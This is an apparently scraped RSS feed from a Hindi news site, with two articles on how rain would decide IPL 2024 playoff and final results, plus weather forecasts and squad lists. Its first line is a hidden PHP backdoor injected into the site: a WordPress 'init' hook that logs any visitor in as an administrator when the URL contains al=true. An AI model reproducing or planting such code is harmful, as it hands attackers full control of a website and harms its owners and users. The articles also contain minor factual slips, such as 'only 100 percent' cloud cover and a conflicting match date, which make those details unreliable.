// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); IPL 2024 Playoffs – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 24 May 2024 11:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 IPL फाइनल में बारिश ने डाला खलल तो कौन होगा चैम्पियन? जानिए समीकरण और नियम https://pratyushaashakinayikiran.com/?p=33668 Fri, 24 May 2024 11:26:00 +0000 https://pratyushaashakinayikiran.com/?p=33668 चेन्नई
इंडियन प्रीमियर लीग (IPL) 2024 सीजन अब फाइनल में एंट्री कर चुका है. क्वालिफायर-1 जीतकर कोलकाता नाइट राइडर्स (KKR) पहले ही फाइनल में पहुंच चुकी है. जबकि क्वालिफायर-1 हारने वाली टीम सनराइजर्स हैदराबाद (SRH) को अब क्वालिफायर-2 खेलना होगा. इस मुकाबले में उसकी टक्कर एलिमिनेटर की विजेता राजस्थान रॉयल्स (RR) से होगी.

यह क्वालिफायर-2 कल (24 मई) चेन्नई के चेपॉक स्टेडियम में खेला जाएगा. यह मैच जीतने वाली टीम 26 मई को फाइनल में केकेआर से भिड़ेगी. अब यहां फैन्स के मन में यह सवाल जरूर होगा कि यदि क्वालिफायर-2 या फाइनल मुकाबले में बारिश खलल डालती है या किसी अन्य वजह से मैच नहीं होते हैं तो फिर नतीजा कैसे निकलेगा.

ग्रुप स्टेज में ये 2 मुकाबले बारिश से धुल चुके

ये सवाल इसलिए भी जरूर है क्योंकि ग्रुप स्टेज के दो मुकाबले बारिश के चलते धुल चुके हैं. 13 मई को गुजरात टाइटन्स (GT) और कोलकाता नाइट राइडर्स (KKR) के बीच का मुकाबला बारिश के चलते रद्द हो गया था. इसके बाद 16 मई को सनराइजर्स हैदराबाद (SRH) और गुजरात टाइटन्स का मैच भी बारिश के चलते बेनतीजा रहा.

मगर क्वालिफायर-2 और फाइनल दोनों ही मुकाबले चेन्नई के चेपॉक स्टेडियम में होंगे. यदि दोनों ही मुकाबलों के दौरान बारिश आती है और मुकाबला रद्द करने की नौबत आती है, तो क्या होगा? आइए जानते हैं पूरा समीकरण…

मैच रद्द करने की नौबत आई तो कौन होगा विजेता?

IPL की प्लेइंग कंडीशन्स के मुताबिक, यदि क्वालिफायर-2 के दौरान बारिश आती है, तो अंपायर 5-5 ओवर का मैच कराने की पूरी कोशिश करेंगे. यदि यह भी नहीं हो पाता है तो सुपर ओवर की मदद से नतीजा निकालने की कोशिश की जाएगी. यदि सुपर ओवर भी नहीं हो पाता है, तब मैच रद्द माना जाएगा.

ऐसी स्थिति में पॉइंट टेबल के हिसाब से विजेता घोषित किया जाएगा. यानी ग्रुप स्टेज के बाद फाइनल पॉइंट्स टेबल में जो टीम ऊपर होगी, उसे विजेता घोषित किया जाएगा. यानी इस क्वालिफायर-2 में हैदराबाद विजेता रहेगी, क्योंकि वो दूसरे नंबर पर काबिज थी. जबकि राजस्थान टीम तीसरे नंबर पर रही थी. हालांकि फाइनल के लिए नियम थोड़े अलग होंगे. आइए आईपीएल फाइनल का समीकरण भी जान लेते हैं.

फाइनल मैच में हो सकता है रिजर्व डे

फाइनल मुकाबले के लिए रिजर्व डे है या नहीं ये फिलहाल स्पष्ट नहीं है. हालांकि पिछले साल फाइनल मुकाबला रिजर्व डे में पहुंचा था. शायद इस बार भी वैसी स्थिति बनने पर रिजर्व डे का इस्तेमाल किया जाएगा. आईपीएल 2024 का फाइनल मुकाबला 26 मई को चेन्नई में होना है. यानी उस दिन नतीजा नहीं निकलने पर फाइनल 27 मई को करवाया जा सकता है.

रिजर्व डे में मैच वहीं से शुरू होगा जहां रुका था. अगर रिजर्व डे में भी बारिश का खलल पड़ता है और नियमित समय में मिनिमम 5-5 ओवरों का खेल संभव नहीं हो पाता तो IPL के विजेता का फैसला सुपर ओवर से होगा. अगर फाइनल मुकाबले में भी सुपर ओवर नहीं हो पाता तो यहां भी पॉइंट्स टेबल के आधार पर विजेता का फैसला होगा.

ऐसा रहेगा चेन्नई में मौसम का हाल

यदि चेन्नई में मौसम के मिजाज की बात करें तो एक्वावेदर के मुताबिक, वहां 24 और 26 मई को बारिश की आशंका ना के बराबर है. 24 मई को यहां बारिश की आशंका सिर्फ 5 प्रतिशत है, जबकि 26 मई को 4 ही प्रतिशत है. यहां फाइनल वाले दिन यानी 26 मई को अधिकतम तापमान 37 और न्यूनतम तापमान 29 डिग्री सेल्सियस रहने का अनुमान है. बादल छाए रहने का अनुमान भी सिर्फ 100 प्रतिशत ही है. हवाओं की गति 43 km/h रहेगी.

]]>
क्वालिफायर-1 में बारिश बनी विलेन तो KKR या हैदराबाद में से कौन खेलेगा फाइनल? जानें समीकरण https://pratyushaashakinayikiran.com/?p=32838 Tue, 21 May 2024 13:27:00 +0000 https://pratyushaashakinayikiran.com/?p=32838 अहमदाबाद

इंडियन प्रीमियर लीग (IPL) 2024 सीजन अब प्लेऑफ में एंट्री कर चुका है. ग्रुप स्टेज के सभी मुकाबले खत्म हो गए हैं. अब प्लेऑफ का पहला मुकाबला यानी क्वालिफायर-1 मंगलवार (21 मई) को अहमदाबाद के नरेंद्र मोदी स्टेडियम में खेला जाएगा.

इस मुकाबले में कोलकाता नाइट राइडर्स (KKR) और सनराइजर्स हैदराबाद (SRH) टीमें आमने-सामने होंगी. इसी मोदी स्टेडियम में खेले गए पिछले मुकाबले में बारिश का कहर देखने को मिला था. यहां 13 मई को गुजरात टाइटन्स (GT) और कोलकाता नाइट राइडर्स (KKR) के बीच का मुकाबला बारिश के चलते रद्द हो गया था.

इसके बाद 16 मई को सनराइजर्स हैदराबाद (SRH) और गुजरात टाइटन्स का मैच भी बारिश के चलते बेनतीजा रहा. हालांकि यह मैच हैदाराबाद में होना था. मगर इन सबके बीच अब फैन्स इस बात से डरे हुए हैं कि यदि क्वालिफायर-1 में भी बारिश आती है और मुकाबला रद्द करने की नौबत आती है, तो क्या होगा? आइए जानते हैं पूरा समीकरण…

मैच रद्द करने की नौबत आई तो कौन होगा विजेता?

IPL की प्लेइंग कंडीशन्स के मुताबिक, यदि क्वालिफायर-1 के दौरान बारिश आती है, तो अंपायर 5-5 ओवर का मैच कराने की पूरी कोशिश करेंगे. यदि यह भी नहीं हो पाता है तो सुपर ओवर की मदद से नतीजा निकालने की कोशिश की जाएगी. यदि सुपर ओवर भी नहीं हो पाता है, तब मैच रद्द माना जाएगा.

 

ऐसी स्थिति में पॉइंट टेबल के हिसाब से विजेता घोषित किया जाएगा. यानी ग्रुप स्टेज के बाद फाइनल पॉइंट्स टेबल में जो टीम ऊपर होगी, उसे विजेता घोषित किया जाएगा. यानी इस क्वालिफायर-1 में कोलकाता विजेता रहेगी, क्योंकि वो टॉप पर काबिज थी. जबकि हैदराबाद टीम दूसरे नंबर पर रही थी.

क्वालिफायर-1 की तरह ही एलिमिनेटर और क्वालिफायर-2 में भी बारिश आती है, तो ठीक इसी नियम के तहत विजेता तय किया जाएगा. हालांकि फाइनल के लिए नियम थोड़े अलग होंगे. आइए आईपीएल फाइनल का समीकरण भी जान लेते हैं.

फाइनल मैच में हो सकता है रिजर्व डे

फाइनल मुकाबले के लिए रिजर्व डे है या नहीं ये फिलहाल स्पष्ट नहीं है. हालांकि पिछले साल फाइनल मुकाबला रिजर्व डे में पहुंचा था. शायद इस बार भी वैसी स्थिति बनने पर रिजर्व डे का इस्तेमाल किया जाएगा. आईपीएल 2024 का फाइनल मुकाबला 26 मई को चेन्नई के एमए चिदंबरम स्टेडियम में होना है. यानी उस दिन नतीजा नहीं निकलने पर फाइनल 27 मई को करवाया जा सकता है.

रिजर्व डे में मैच वहीं से शुरू होगा जहां रुका था. अगर रिजर्व डे में भी बारिश का खलल पड़ता है और नियमित समय में मिनिमम 5-5 ओवरों का खेल संभव नहीं हो पाता तो IPL के विजेता का फैसला सुपर ओवर से हो सकता है. अगर फाइनल मुकाबले में भी सुपर ओवर नहीं हो पाता तो यहां भी पॉइंट्स टेबल के आधार पर विजेता का फैसला होगा.

प्लेऑफ का शेड्यूल

क्वालिफायर-1
कोलकाता Vs हैदराबाद  –  अहमदाबाद   – 21 मई

एलिमिनेटर
राजस्थान Vs बेंगलुरु  –  अहमदाबाद   – 22 मई

क्वालिफायर-2
क्वालिफायर-1 हारने वाली टीम Vs एलिमिनेटर की विजेता  –  चेन्नई   – 24 मई

फाइनल
क्वालिफायर-1 की विजेता Vs क्वालिफायर-2 की विजेता   –  चेन्नई   – 26 मई

ऐसा रहेगा अहमदाबाद में मौसम का हाल

यदि अहमदाबाद में मौसम के मिजाज की बात करें तो एक्वावेदर के मुताबिक, मंगलवार को यहां बारिश की आशंका बिल्कुल भी नहीं है. यहां अधिकतम तापमान 45 और न्यूनतम तापमान 31 डिग्री सेल्सियस रहने का अनुमान है. बादल छाए रहने का अनुमान भी सिर्फ 2 प्रतिशत ही है. हवाओं की गति 41 km/h रहेगी.

क्वालीफायर-1 मैच में कैसा रहेगा मौसम

ये मैच दोनों टीमों के लिए काफी अहम रहने वाला है। इस मैच को जीतने वाली टीम फाइनल में अपनी जगह पक्की कर लेगी। वहीं, मौसम की बात की जाए तो इस मुकाबले के दिन अहमदाबाद में बारिश की संभावना ना के बराबर है। मौसम विभाग के अनुसार, अहमदाबाद का मौसम सुहाना रहेगा और धूप खिलेगी। अहमदाबाद में मैच के दौरान तापमान 38-42 डिग्री सेल्सियस के आसपास रहने की उम्मीद है। ऐसे में फैंस को 21 मई को बिना किसी परेशानी के मैच का मजा लेने का मौका मिलेगा। 

प्लेऑफ मैचों के लिए IPL का नियम 

प्लेऑफ के मैचों के दौरान बारिश होने पर कम से कम 5-5 ओवर का मैच करवाने की कोशिश की जाएगी या फिर सुपर ओवर से भी नतीजा निकाला जा सकता है। लेकिन मैच में एक भी गेंद नहीं फेंकी जाती है तो प्वॉइंट्स टेबल में टीमों की पोजीशन के हिसाब से फैसला लिया जाएगा। कोलकाता नाइट राइडर्स और सनराइजर्स हैदराबाद के बीच खेला जाने वाला मैच रद्द होता है तो इसका फायदा कोलकाता नाइट राइडर्स को मिलेगा। दरअसल, कोलकाता नाइट राइडर्स लीग स्टेज में टॉप पर रही है। ऐसे में वह क्वालीफायर-1 मैच रद्द होने पर सीधा फाइनल में पहुंच जाएगी। 

IPL 2024 में बारिश की भेंट चढ़े ये 3 मैच 

बारिश के चलते इस सीजन में अभी तक 3 मैच रद्द हो चुके हैं। 3 मई को गुजरात टाइटंस और कोलकाता नाइट राइडर्स के बीच का मुकाबला बारिश के चलते रद्द हो गया था। फिर 16 मई को सनराइजर्स हैदराबाद और गुजरात टाइटंस का मैच भी बारिश में धूल गया था। लीग स्टेज का आखिरी मैच भी बारिश के चलते नहीं खेला जा सका था। 

दोनों टीमों का स्क्वॉड

सनराइजर्स हैदराबाद: ट्रैविस हेड, नितीश रेड्डी, हेनरिक क्लासेन (विकेटकीपर), अब्दुल समद, शाहबाज़ अहमद, सनवीर सिंह, पैट कमिंस (कप्तान), भुवनेश्वर कुमार, जयदेव उनादकट, विजयकांत व्यासकांत, टी नटराजन, अभिषेक शर्मा, उमरान मलिक, मयंक अग्रवाल, ग्लेन फिलिप्स, वॉशिंगटन सुंदर, मार्को जानसन, मयंक मारकंडे, एडेन मार्कराम, राहुल त्रिपाठी, अनमोलप्रीत सिंह, उपेंद्र यादव, झटवेध सुब्रमण्यन, फजलहक फारूकी, आकाश महाराज सिंह। 

कोलकाता नाइट राइडर्स: रहमानुल्लाह गुरबाज (विकेटकीपर), सुनील नारायण, वेंकटेश अय्यर, श्रेयस अय्यर (कप्तान), रिंकू सिंह, नितीश राणा, आंद्रे रसेल, रमनदीप सिंह, मिशेल स्टार्क, हर्षित राणा, वरुण चक्रवर्ती, वैभव अरोड़ा, अनुकूल रॉय, सुयश शर्मा, अंगकृष रघुवंशी, मनीष पांडे, दुष्मंथा चमीरा, श्रीकर भरत, चेतन सकारिया, शेरफेन रदरफोर्ड, साकिब हुसैन, अल्लाह गजनफर।

]]>